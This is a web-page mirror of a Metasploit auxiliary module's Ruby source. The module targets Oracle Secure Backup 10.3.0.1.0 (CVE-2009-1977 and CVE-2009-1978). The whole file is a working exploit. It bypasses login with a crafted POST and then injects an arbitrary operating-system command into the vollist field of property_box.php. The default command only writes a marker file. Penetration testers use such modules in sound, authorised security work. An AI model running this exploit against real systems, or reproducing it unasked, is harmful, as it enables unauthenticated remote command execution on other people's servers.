Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr2.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',

14
        'Description' => %q{

15
          This module exploits an authentication bypass vulnerability

16
          in login.php in order to execute arbitrary code via a command injection

17
          vulnerability in property_box.php. This module was tested

18
          against Oracle Secure Backup version 10.3.0.1.0 (Win32).

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2009-1977' ],

24
          [ 'OSVDB', '55903' ],

25
          [ 'CVE', '2009-1978' ],

26
          [ 'OSVDB', '55904' ],

27
          [ 'ZDI', '09-058' ],

28
          [ 'ZDI', '09-059' ],

29
        ],

30
        'DisclosureDate' => '2009-08-18',

31
        'Notes' => {

32
          'Stability' => [CRASH_SAFE],

33
          'SideEffects' => [IOC_IN_LOGS],

34
          'Reliability' => []

35
        }

36
      )

37
    )

38


39
    register_options(

40
      [

41
        Opt::RPORT(443),

42
        OptString.new('CMD', [ false, 'The command to execute.', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt' ]),

43
        OptBool.new('SSL', [true, 'Use SSL', true]),

44
      ]

45
    )

46
  end

47


48
  def run

49
    cmd = datastore['CMD']

50


51
    res = send_request_cgi(

52
      {

53
        'uri'	=> '/login.php',

54
        'data'	=> 'button=Login&attempt=1&mode=&tab=75&uname=-msf&passwd=msf',

55
        'method' => 'POST'

56
      }, 5

57
    )

58


59
    if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)

60


61
      print_status("Sending command: #{datastore['CMD']}...")

62


63
      send_request_cgi(

64
        {

65
          'uri'	=> '/property_box.php',

66
          'data' => 'type=Sections&vollist=75' + Rex::Text.uri_encode('&' + cmd),

67
          'cookie' => res.get_cookies,

68
          'method' => 'POST'

69
        }, 5

70
      )

71


72
      print_status('Done.')

73
    else

74
      print_error('Invalid PHPSESSION token..')

75
      return

76
    end

77
  end

78
end

79


80